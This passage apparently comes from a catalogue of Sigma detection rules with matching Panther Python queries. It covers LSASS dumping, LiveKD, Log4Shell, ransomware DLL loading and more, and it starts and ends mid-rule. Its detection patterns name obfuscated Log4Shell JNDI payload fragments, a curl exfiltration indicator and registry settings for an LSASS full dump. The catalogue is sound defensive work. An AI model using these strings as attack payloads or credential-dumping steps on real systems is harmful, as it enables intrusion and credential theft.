            - 'payload.enc'
            - 'session.key.enc'
    selection_curl:
        Image|endswith: '/curl'
        CommandLine|contains|all:
            - 'models.litellm.cloud'
            - 'X-Filename: tpcp.tar.gz'
    selection_sysmon_service:
        ParentImage|contains: '/python3'
        CommandLine|contains|all:
            - 'systemctl'
            - '--user'
            - 'sysmon'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: high
level: high · quality: Moderate · alert volume: High FP
Live Memory Dump Using Powershell
Detects usage of a PowerShell command to dump the live memory of a Windows machine
status: test · author: Max Altgelt (Nextron Systems) · ATT&CK mapping: technique · id: cd185561-4760-45d6-a63e-a51325112cae
panther query
def rule(event):
    if all(
        [
            "Get-StorageDiagnosticInfo" in event.deep_get("ScriptBlockText", default=""),
            "-IncludeLiveDump" in event.deep_get("ScriptBlockText", default=""),
        ]
    ):
        return True
    return False
sigma yaml
title: Live Memory Dump Using Powershell
id: cd185561-4760-45d6-a63e-a51325112cae
status: test
description: Detects usage of a PowerShell command to dump the live memory of a Windows machine
references:
    - https://learn.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo?view=windowsserver2022-ps
author: Max Altgelt (Nextron Systems)
date: 2021-09-21
modified: 2022-12-25
tags:
    - attack.credential-access
    - attack.t1003
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - 'Get-StorageDiagnosticInfo'
            - '-IncludeLiveDump'
    condition: selection
falsepositives:
    - Diagnostics
level: high
level: high · quality: Moderate · alert volume: Medium FP
LiveKD Driver Creation By Uncommon Process
Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: tactic-only · id: 059c5af9-5131-4d8d-92b2-de4ad6146712
panther query
def rule(event):
    if all(
        [
            event.deep_get("TargetFilename", default="")
            == "C:\\Windows\\System32\\drivers\\LiveKdD.SYS",
            not any(
                [
                    event.deep_get("Image", default="").endswith("\\livekd.exe"),
                    event.deep_get("Image", default="").endswith("\\livek64.exe"),
                ]
            ),
        ]
    ):
        return True
    return False
sigma yaml
title: LiveKD Driver Creation By Uncommon Process
id: 059c5af9-5131-4d8d-92b2-de4ad6146712
related:
    - id: 16fe46bb-4f64-46aa-817d-ff7bec4a2352
      type: similar
status: test
description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
references:
    - Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-16
tags:
    - attack.privilege-escalation
    - attack.stealth
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename: 'C:\Windows\System32\drivers\LiveKdD.SYS'
    filter_main_legit_name:
        Image|endswith:
            - '\livekd.exe'
            - '\livek64.exe'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter
level: high
level: high · quality: Moderate · alert volume: Medium FP
LiveKD Kernel Memory Dump File Created
Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: tactic-only · id: 814ddeca-3d31-4265-8e07-8cc54fb44903
panther query
def rule(event):
    if event.deep_get("TargetFilename", default="") == "C:\\Windows\\livekd.dmp":
        return True
    return False
sigma yaml
title: LiveKD Kernel Memory Dump File Created
id: 814ddeca-3d31-4265-8e07-8cc54fb44903
status: test
description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
references:
    - Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-16
tags:
    - attack.privilege-escalation
    - attack.stealth
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename: 'C:\Windows\livekd.dmp'
    condition: selection
falsepositives:
    - In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary.
level: high
level: high · quality: Strong · alert volume: High FP
Load Of RstrtMgr.DLL By A Suspicious Process
Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shutting down specific processes.
status: test · author: Luc Génaux · ATT&CK mapping: technique · id: b48492dc-c5ef-4572-8dff-32bc241c15c8
panther query
def rule(event):
    if all(
        [
            any(
                [
                    event.deep_get("ImageLoaded", default="").endswith("\\RstrtMgr.dll"),
                    event.deep_get("OriginalFileName", default="") == "RstrtMgr.dll",
                ]
            ),
            any(
                [
                    any(
                        [
                            ":\\Perflogs\\" in event.deep_get("Image", default=""),
                            ":\\Users\\Public\\" in event.deep_get("Image", default=""),
                            "\\Temporary Internet" in event.deep_get("Image", default=""),
                        ]
                    ),
                    any(
                        [
                            all(
                                [
                                    ":\\Users\\" in event.deep_get("Image", default=""),
                                    "\\Favorites\\" in event.deep_get("Image", default=""),
                                ]
                            ),
                            all(
                                [
                                    ":\\Users\\" in event.deep_get("Image", default=""),
                                    "\\Favourites\\" in event.deep_get("Image", default=""),
                                ]
                            ),
                            all(
                                [
                                    ":\\Users\\" in event.deep_get("Image", default=""),
                                    "\\Contacts\\" in event.deep_get("Image", default=""),
                                ]
                            ),
                        ]
                    ),
                ]
            ),
        ]
    ):
        return True
    return False
sigma yaml
title: Load Of RstrtMgr.DLL By A Suspicious Process
id: b48492dc-c5ef-4572-8dff-32bc241c15c8
related:
    - id: 3669afd2-9891-4534-a626-e5cf03810a61
      type: derived
status: test
description: |
    Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.
    This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
    It could also be used for anti-analysis purposes by shut downing specific processes.
references:
    - https://www.crowdstrike.com/blog/windows-restart-manager-part-1/
    - https://www.crowdstrike.com/blog/windows-restart-manager-part-2/
    - https://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/
    - https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html
author: Luc Génaux
date: 2023-11-28
tags:
    - attack.impact
    - attack.defense-impairment
    - attack.t1486
    - attack.t1685
logsource:
    category: image_load
    product: windows
detection:
    selection_img:
        - ImageLoaded|endswith: '\RstrtMgr.dll'
        - OriginalFileName: 'RstrtMgr.dll'
    selection_folders_1:
        Image|contains:
            # Note: increase coverage by adding more suspicious paths
            - ':\Perflogs\'
            - ':\Users\Public\'
            - '\Temporary Internet'
    selection_folders_2:
        - Image|contains|all:
              - ':\Users\'
              - '\Favorites\'
        - Image|contains|all:
              - ':\Users\'
              - '\Favourites\'
        - Image|contains|all:
              - ':\Users\'
              - '\Contacts\'
    condition: selection_img and 1 of selection_folders_*
falsepositives:
    - Processes related to software installation
level: high
level: high · quality: Strong · alert volume: Medium FP
Loading Diagcab Package From Remote Path
Detects loading of diagcab packages from a remote path, as seen in the DogWalk vulnerability
status: test · author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: tactic-only · id: 50cb47b8-2c33-4b23-a2e9-4600657d9746
panther query
def rule(event):
    if all(
        [
            event.deep_get("EventID", default="") == 101,
            "\\\\" in event.deep_get("PackagePath", default=""),
        ]
    ):
        return True
    return False
sigma yaml
title: Loading Diagcab Package From Remote Path
id: 50cb47b8-2c33-4b23-a2e9-4600657d9746
status: test
description: Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability
references:
    - https://twitter.com/nas_bench/status/1539679555908141061
    - https://twitter.com/j00sean/status/1537750439701225472
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-14
tags:
    - attack.execution
logsource:
    product: windows
    service: diagnosis-scripted
detection:
    selection:
        EventID: 101
        PackagePath|contains: '\\\\' # Example would be: \\webdav-test.herokuapp.com@ssl\DavWWWRoot\package
    condition: selection
falsepositives:
    - Legitimate package hosted on a known and authorized remote location
level: high
level: high · quality: Moderate · alert volume: Low FP
Loading of Kernel Module via Insmod
Detects loading of kernel modules with the insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded into and unloaded from the kernel on demand. Adversaries may use LKMs to obtain persistence within the system or elevate privileges.
status: test · author: Pawel Mazur · ATT&CK mapping: sub-technique · id: 106d7cbd-80ff-4985-b682-a7043e5acb72
panther query
def rule(event):
    if all(
        [
            event.deep_get("type", default="") == "SYSCALL",
            event.deep_get("comm", default="") == "insmod",
            event.deep_get("exe", default="") == "/usr/bin/kmod",
        ]
    ):
        return True
    return False
sigma yaml
title: Loading of Kernel Module via Insmod
id: 106d7cbd-80ff-4985-b682-a7043e5acb72
status: test
description: |
    Detects loading of kernel modules with insmod command.
    Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.
    Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md
    - https://linux.die.net/man/8/insmod
    - https://man7.org/linux/man-pages/man8/kmod.8.html
author: 'Pawel Mazur'
date: 2021-11-02
modified: 2022-12-25
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1547.006
logsource:
    product: linux
    service: auditd
detection:
    selection:
        type: 'SYSCALL'
        comm: insmod
        exe: /usr/bin/kmod
    condition: selection
falsepositives:
    - Unknown
level: high
level: high · quality: Moderate · alert volume: Low FP
Local Privilege Escalation Indicator TabTip
Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode
status: test · author: Florian Roth (Nextron Systems) · ATT&CK mapping: sub-technique · id: bc2e25ed-b92b-4daa-b074-b502bdd1982b
panther query
def rule(event):
    if all(
        [
            event.deep_get("Provider_Name", default="") == "Microsoft-Windows-DistributedCOM",
            event.deep_get("EventID", default="") == 10001,
            event.deep_get("param1", default="")
            == "C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe",
            event.deep_get("param2", default="") == 2147943140,
            event.deep_get("param3", default="") == "{054AAE20-4BEA-4347-8A35-64A533254A9D}",
        ]
    ):
        return True
    return False
sigma yaml
title: Local Privilege Escalation Indicator TabTip
id: bc2e25ed-b92b-4daa-b074-b502bdd1982b
status: test
description: Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode
references:
    - https://github.com/antonioCoco/JuicyPotatoNG
author: Florian Roth (Nextron Systems)
date: 2022-10-07
modified: 2023-04-14
tags:
    - attack.collection
    - attack.execution
    - attack.credential-access
    - attack.t1557.001
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Microsoft-Windows-DistributedCOM'
        EventID: 10001
        param1: 'C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe'  # Binary starting/started
        param2: 2147943140                                                       # ERROR id
        param3: '{054AAE20-4BEA-4347-8A35-64A533254A9D}'                         # DCOM Server
    condition: selection
falsepositives:
    - Unknown
level: high
level: high · quality: Moderate · alert volume: Medium FP
Log4j RCE CVE-2021-44228 Generic
Detects exploitation attempts against the log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)
status: test · author: Florian Roth (Nextron Systems) · ATT&CK mapping: technique · id: 5ea8faa8-db8b-45be-89b0-151b84c82702
panther query
import json


def rule(event):
    if all(
        [
            any(
                [
                    "${jndi:ldap:/" in json.dumps(event.to_dict()),
                    "${jndi:rmi:/" in json.dumps(event.to_dict()),
                    "${jndi:ldaps:/" in json.dumps(event.to_dict()),
                    "${jndi:dns:/" in json.dumps(event.to_dict()),
                    "/$%7bjndi:" in json.dumps(event.to_dict()),
                    "%24%7bjndi:" in json.dumps(event.to_dict()),
                    "$%7Bjndi:" in json.dumps(event.to_dict()),
                    "%2524%257Bjndi" in json.dumps(event.to_dict()),
                    "%2F%252524%25257Bjndi%3A" in json.dumps(event.to_dict()),
                    "${jndi:${lower:" in json.dumps(event.to_dict()),
                    "${::-j}${" in json.dumps(event.to_dict()),
                    "${jndi:nis" in json.dumps(event.to_dict()),
                    "${jndi:nds" in json.dumps(event.to_dict()),
                    "${jndi:corba" in json.dumps(event.to_dict()),
                    "${jndi:iiop" in json.dumps(event.to_dict()),
                    "Reference Class Name: foo" in json.dumps(event.to_dict()),
                    "${${env:BARFOO:-j}" in json.dumps(event.to_dict()),
                    "${::-l}${::-d}${::-a}${::-p}" in json.dumps(event.to_dict()),
                    "${base64:JHtqbmRp" in json.dumps(event.to_dict()),
                    "${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$" in json.dumps(event.to_dict()),
                    "${${lower:j}ndi:" in json.dumps(event.to_dict()),
                    "${${upper:j}ndi:" in json.dumps(event.to_dict()),
                    "${${::-j}${::-n}${::-d}${::-i}:" in json.dumps(event.to_dict()),
                ]
            ),
            not any(
                [
                    "w.nessus.org/nessus" in json.dumps(event.to_dict()),
                    "/nessus}" in json.dumps(event.to_dict()),
                ]
            ),
        ]
    ):
        return True
    return False
sigma yaml
title: Log4j RCE CVE-2021-44228 Generic
id: 5ea8faa8-db8b-45be-89b0-151b84c82702
status: test
description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)
references:
    - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://news.ycombinator.com/item?id=29504755
    - https://github.com/tangxiaofeng7/apache-log4j-poc
    - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
    - https://github.com/YfryTchsGD/Log4jAttackSurface
    - https://twitter.com/shutingrz/status/1469255861394866177?s=21
author: Florian Roth (Nextron Systems)
date: 2021-12-10
modified: 2022-02-06
tags:
    - attack.initial-access
    - attack.t1190
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    keywords:
        - '${jndi:ldap:/'
        - '${jndi:rmi:/'
        - '${jndi:ldaps:/'
        - '${jndi:dns:/'
        - '/$%7bjndi:'
        - '%24%7bjndi:'
        - '$%7Bjndi:'
        - '%2524%257Bjndi'
        - '%2F%252524%25257Bjndi%3A'
        - '${jndi:${lower:'
        - '${::-j}${'
        - '${jndi:nis'
        - '${jndi:nds'
        - '${jndi:corba'
        - '${jndi:iiop'
        - 'Reference Class Name: foo'
        - '${${env:BARFOO:-j}'
        - '${::-l}${::-d}${::-a}${::-p}'
        - '${base64:JHtqbmRp'
        - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
        - '${${lower:j}ndi:'
        - '${${upper:j}ndi:'
        - '${${::-j}${::-n}${::-d}${::-i}:'
    filter:
        - 'w.nessus.org/nessus'
        - '/nessus}'
    condition: keywords and not filter
falsepositives:
    - Vulnerability scanning
level: high
high Strong Medium FP
Log4j RCE CVE-2021-44228 in Fields
Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
status test author Florian Roth (Nextron Systems) ATT&CK technique id 9be472ed-893c-4ec0-94da-312d2765f654
panther query
def rule(event):
    if any(
        [
            any(
                [
                    "${jndi:ldap:/" in event.deep_get("cs-user-agent", default=""),
                    "${jndi:rmi:/" in event.deep_get("cs-user-agent", default=""),
                    "${jndi:ldaps:/" in event.deep_get("cs-user-agent", default=""),
                    "${jndi:dns:/" in event.deep_get("cs-user-agent", default=""),
                    "/$%7bjndi:" in event.deep_get("cs-user-agent", default=""),
                    "%24%7bjndi:" in event.deep_get("cs-user-agent", default=""),
                    "$%7Bjndi:" in event.deep_get("cs-user-agent", default=""),
                    "%2524%257Bjndi" in event.deep_get("cs-user-agent", default=""),
                    "%2F%252524%25257Bjndi%3A" in event.deep_get("cs-user-agent", default=""),
                    "${jndi:${lower:" in event.deep_get("cs-user-agent", default=""),
                    "${::-j}${" in event.deep_get("cs-user-agent", default=""),
                    "${jndi:nis" in event.deep_get("cs-user-agent", default=""),
                    "${jndi:nds" in event.deep_get("cs-user-agent", default=""),
                    "${jndi:corba" in event.deep_get("cs-user-agent", default=""),
                    "${jndi:iiop" in event.deep_get("cs-user-agent", default=""),
                    "Reference Class Name: foo" in event.deep_get("cs-user-agent", default=""),
                    "${${env:BARFOO:-j}" in event.deep_get("cs-user-agent", default=""),
                    "${::-l}${::-d}${::-a}${::-p}" in event.deep_get("cs-user-agent", default=""),
                    "${base64:JHtqbmRp" in event.deep_get("cs-user-agent", default=""),
                    "${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$"
                    in event.deep_get("cs-user-agent", default=""),
                    "${${lower:j}ndi:" in event.deep_get("cs-user-agent", default=""),
                    "${${upper:j}ndi:" in event.deep_get("cs-user-agent", default=""),
                    "${${::-j}${::-n}${::-d}${::-i}:"
                    in event.deep_get("cs-user-agent", default=""),
                ]
            ),
            any(
                [
                    "${jndi:ldap:/" in event.deep_get("cs-uri-query", default=""),
                    "${jndi:rmi:/" in event.deep_get("cs-uri-query", default=""),
                    "${jndi:ldaps:/" in event.deep_get("cs-uri-query", default=""),
                    "${jndi:dns:/" in event.deep_get("cs-uri-query", default=""),
                    "/$%7bjndi:" in event.deep_get("cs-uri-query", default=""),
                    "%24%7bjndi:" in event.deep_get("cs-uri-query", default=""),
                    "$%7Bjndi:" in event.deep_get("cs-uri-query", default=""),
                    "%2524%257Bjndi" in event.deep_get("cs-uri-query", default=""),
                    "%2F%252524%25257Bjndi%3A" in event.deep_get("cs-uri-query", default=""),
                    "${jndi:${lower:" in event.deep_get("cs-uri-query", default=""),
                    "${::-j}${" in event.deep_get("cs-uri-query", default=""),
                    "${jndi:nis" in event.deep_get("cs-uri-query", default=""),
                    "${jndi:nds" in event.deep_get("cs-uri-query", default=""),
                    "${jndi:corba" in event.deep_get("cs-uri-query", default=""),
                    "${jndi:iiop" in event.deep_get("cs-uri-query", default=""),
                    "Reference Class Name: foo" in event.deep_get("cs-uri-query", default=""),
                    "${${env:BARFOO:-j}" in event.deep_get("cs-uri-query", default=""),
                    "${::-l}${::-d}${::-a}${::-p}" in event.deep_get("cs-uri-query", default=""),
                    "${base64:JHtqbmRp" in event.deep_get("cs-uri-query", default=""),
                    "${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$"
                    in event.deep_get("cs-uri-query", default=""),
                    "${${lower:j}ndi:" in event.deep_get("cs-uri-query", default=""),
                    "${${upper:j}ndi:" in event.deep_get("cs-uri-query", default=""),
                    "${${::-j}${::-n}${::-d}${::-i}:" in event.deep_get("cs-uri-query", default=""),
                ]
            ),
            any(
                [
                    "${jndi:ldap:/" in event.deep_get("cs-referer", default=""),
                    "${jndi:rmi:/" in event.deep_get("cs-referer", default=""),
                    "${jndi:ldaps:/" in event.deep_get("cs-referer", default=""),
                    "${jndi:dns:/" in event.deep_get("cs-referer", default=""),
                    "/$%7bjndi:" in event.deep_get("cs-referer", default=""),
                    "%24%7bjndi:" in event.deep_get("cs-referer", default=""),
                    "$%7Bjndi:" in event.deep_get("cs-referer", default=""),
                    "%2524%257Bjndi" in event.deep_get("cs-referer", default=""),
                    "%2F%252524%25257Bjndi%3A" in event.deep_get("cs-referer", default=""),
                    "${jndi:${lower:" in event.deep_get("cs-referer", default=""),
                    "${::-j}${" in event.deep_get("cs-referer", default=""),
                    "${jndi:nis" in event.deep_get("cs-referer", default=""),
                    "${jndi:nds" in event.deep_get("cs-referer", default=""),
                    "${jndi:corba" in event.deep_get("cs-referer", default=""),
                    "${jndi:iiop" in event.deep_get("cs-referer", default=""),
                    "Reference Class Name: foo" in event.deep_get("cs-referer", default=""),
                    "${${env:BARFOO:-j}" in event.deep_get("cs-referer", default=""),
                    "${::-l}${::-d}${::-a}${::-p}" in event.deep_get("cs-referer", default=""),
                    "${base64:JHtqbmRp" in event.deep_get("cs-referer", default=""),
                    "${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$"
                    in event.deep_get("cs-referer", default=""),
                    "${${lower:j}ndi:" in event.deep_get("cs-referer", default=""),
                    "${${upper:j}ndi:" in event.deep_get("cs-referer", default=""),
                    "${${::-j}${::-n}${::-d}${::-i}:" in event.deep_get("cs-referer", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Log4j RCE CVE-2021-44228 in Fields
id: 9be472ed-893c-4ec0-94da-312d2765f654
status: test
description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
references:
    - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://news.ycombinator.com/item?id=29504755
    - https://github.com/tangxiaofeng7/apache-log4j-poc
    - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
    - https://github.com/YfryTchsGD/Log4jAttackSurface
    - https://twitter.com/shutingrz/status/1469255861394866177?s=21
author: Florian Roth (Nextron Systems)
date: 2021-12-10
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2021-44228
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection1:
        cs-user-agent|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
            - '/$%7bjndi:'
            - '%24%7bjndi:'
            - '$%7Bjndi:'
            - '%2524%257Bjndi'
            - '%2F%252524%25257Bjndi%3A'
            - '${jndi:${lower:'
            - '${::-j}${'
            - '${jndi:nis'
            - '${jndi:nds'
            - '${jndi:corba'
            - '${jndi:iiop'
            - 'Reference Class Name: foo'
            - '${${env:BARFOO:-j}'
            - '${::-l}${::-d}${::-a}${::-p}'
            - '${base64:JHtqbmRp'
            - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
            - '${${lower:j}ndi:'
            - '${${upper:j}ndi:'
            - '${${::-j}${::-n}${::-d}${::-i}:'
    # selection2:
        # user-agent|contains:
            # - '${jndi:ldap:/'
            # - '${jndi:rmi:/'
            # - '${jndi:ldaps:/'
            # - '${jndi:dns:/'
            # - '/$%7bjndi:'
            # - '%24%7bjndi:'
            # - '$%7Bjndi:'
            # - '%2524%257Bjndi'
            # - '%2F%252524%25257Bjndi%3A'
            # - '${jndi:${lower:'
            # - '${::-j}${'
            # - '${jndi:nis'
            # - '${jndi:nds'
            # - '${jndi:corba'
            # - '${jndi:iiop'
            # - 'Reference Class Name: foo'
            # - '${${env:BARFOO:-j}'
            # - '${::-l}${::-d}${::-a}${::-p}'
            # - '${base64:JHtqbmRp'
            # - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
            # - '${${lower:j}ndi:'
            # - '${${upper:j}ndi:'
            # - '${${::-j}${::-n}${::-d}${::-i}:'
    selection3:
        cs-uri-query|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
            - '/$%7bjndi:'
            - '%24%7bjndi:'
            - '$%7Bjndi:'
            - '%2524%257Bjndi'
            - '%2F%252524%25257Bjndi%3A'
            - '${jndi:${lower:'
            - '${::-j}${'
            - '${jndi:nis'
            - '${jndi:nds'
            - '${jndi:corba'
            - '${jndi:iiop'
            - 'Reference Class Name: foo'
            - '${${env:BARFOO:-j}'
            - '${::-l}${::-d}${::-a}${::-p}'
            - '${base64:JHtqbmRp'
            - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
            - '${${lower:j}ndi:'
            - '${${upper:j}ndi:'
            - '${${::-j}${::-n}${::-d}${::-i}:'
    selection4:
        cs-referer|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
            - '/$%7bjndi:'
            - '%24%7bjndi:'
            - '$%7Bjndi:'
            - '%2524%257Bjndi'
            - '%2F%252524%25257Bjndi%3A'
            - '${jndi:${lower:'
            - '${::-j}${'
            - '${jndi:nis'
            - '${jndi:nds'
            - '${jndi:corba'
            - '${jndi:iiop'
            - 'Reference Class Name: foo'
            - '${${env:BARFOO:-j}'
            - '${::-l}${::-d}${::-a}${::-p}'
            - '${base64:JHtqbmRp'
            - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
            - '${${lower:j}ndi:'
            - '${${upper:j}ndi:'
            - '${${::-j}${::-n}${::-d}${::-i}:'
    condition: 1 of selection*
falsepositives:
    - Vulnerability scanning
level: high
high Moderate Low FP
Logging Configuration Changes on Linux Host
Detects changes to syslog daemon configuration files
status test author Mikhail Larin, oscd.community ATT&CK technique id c830f15d-6f6e-430f-8074-6f73d6807841
panther query
def rule(event):
    if all(
        [
            event.deep_get("type", default="") == "PATH",
            event.deep_get("name", default="")
            in ["/etc/syslog.conf", "/etc/rsyslog.conf", "/etc/syslog-ng/syslog-ng.conf"],
        ]
    ):
        return True
    return False
view Sigma YAML
title: Logging Configuration Changes on Linux Host
id: c830f15d-6f6e-430f-8074-6f73d6807841
status: test
description: Detect changes of syslog daemons configuration files
references:
    - self experience
author: Mikhail Larin, oscd.community
date: 2019-10-25
modified: 2021-11-27
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    product: linux
    service: auditd
detection:
    selection:
        type: 'PATH'
        name:
            - /etc/syslog.conf
            - /etc/rsyslog.conf
            - /etc/syslog-ng/syslog-ng.conf
    condition: selection
falsepositives:
    - Legitimate administrative activity
level: high
high Moderate High FP
Lolbas OneDriveStandaloneUpdater.exe Proxy Download
Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json
status test author frack113 ATT&CK technique id 3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d
panther query
def rule(event):
    if (
        "\\SOFTWARE\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC"
        in event.deep_get("TargetObject", default="")
    ):
        return True
    return False
view Sigma YAML
title: Lolbas OneDriveStandaloneUpdater.exe Proxy Download
id: 3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d
status: test
description: |
    Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any
    anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json
references:
    - https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/
author: frack113
date: 2022-05-28
modified: 2023-08-17
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\SOFTWARE\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC'
    condition: selection
falsepositives:
    - Unknown
level: high
high Strong Medium FP
Lsass Full Dump Request Via DumpType Registry Settings
Detects the setting of the "DumpType" registry value to "2", which stands for a "Full Dump". Techniques such as LSASS Shtinkering require this value to be "2" in order to dump LSASS.
status test author @pbssubhash ATT&CK sub-technique id 33efc23c-6ea2-4503-8cfe-bdf82ce8f719
panther query
def rule(event):
    if all(
        [
            any(
                [
                    "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType"
                    in event.deep_get("TargetObject", default=""),
                    "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\lsass.exe\\DumpType"
                    in event.deep_get("TargetObject", default=""),
                ]
            ),
            event.deep_get("Details", default="") == "DWORD (0x00000002)",
        ]
    ):
        return True
    return False
view Sigma YAML
title: Lsass Full Dump Request Via DumpType Registry Settings
id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f719
status: test
description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.
references:
    - https://github.com/deepinstinct/Lsass-Shtinkering
    - https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps
    - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf
author: '@pbssubhash'
date: 2022-12-08
modified: 2023-08-17
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains:
            - '\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\DumpType'
            - '\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\lsass.exe\DumpType'
        Details: 'DWORD (0x00000002)' # Full Dump
    condition: selection
falsepositives:
    - Legitimate application that needs to do a full dump of their process
level: high
high Moderate Medium FP
Lsass Memory Dump via Comsvcs DLL
Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.
status test author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) ATT&CK sub-technique id a49fa4d5-11db-418c-8473-1e014a8dd462
panther query
def rule(event):
    if all(
        [
            event.deep_get("TargetImage", default="").endswith("\\lsass.exe"),
            event.deep_get("SourceImage", default="").endswith("\\rundll32.exe"),
            "comsvcs.dll" in event.deep_get("CallTrace", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Lsass Memory Dump via Comsvcs DLL
id: a49fa4d5-11db-418c-8473-1e014a8dd462
status: test
description: Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.
references:
    - https://twitter.com/shantanukhande/status/1229348874298388484
    - https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-10-20
modified: 2023-11-29
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
